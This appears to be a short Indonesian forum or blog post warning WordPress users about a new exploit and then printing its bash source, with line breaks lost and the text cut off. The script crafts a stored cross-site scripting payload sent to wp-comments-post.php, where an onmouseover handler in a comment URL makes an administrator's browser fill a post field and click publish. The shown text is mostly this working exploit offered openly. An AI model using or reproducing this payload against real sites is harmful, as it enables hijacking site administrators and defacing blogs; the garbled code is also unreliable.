
Hati2 buat yg make Wordpress, ada exploit baru nih!!ni codenya :#!/bin/bashecho "wp281.quickprz // iso^kpsbr"SITE=$1COMMENT=$2MESSAGE="your message here"if [ "X$SITE" = "X" ]; thenecho "$0 [postID]"echo "f.e. $0 fill your web url here"exitfiif [ "X$POSTID" = "X" ]; thenPOSTID=1fiecho "[+] building payload"WHERE="title" # can also be 'content'PATH="$SITE/wp-comments-post.php"WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"echo...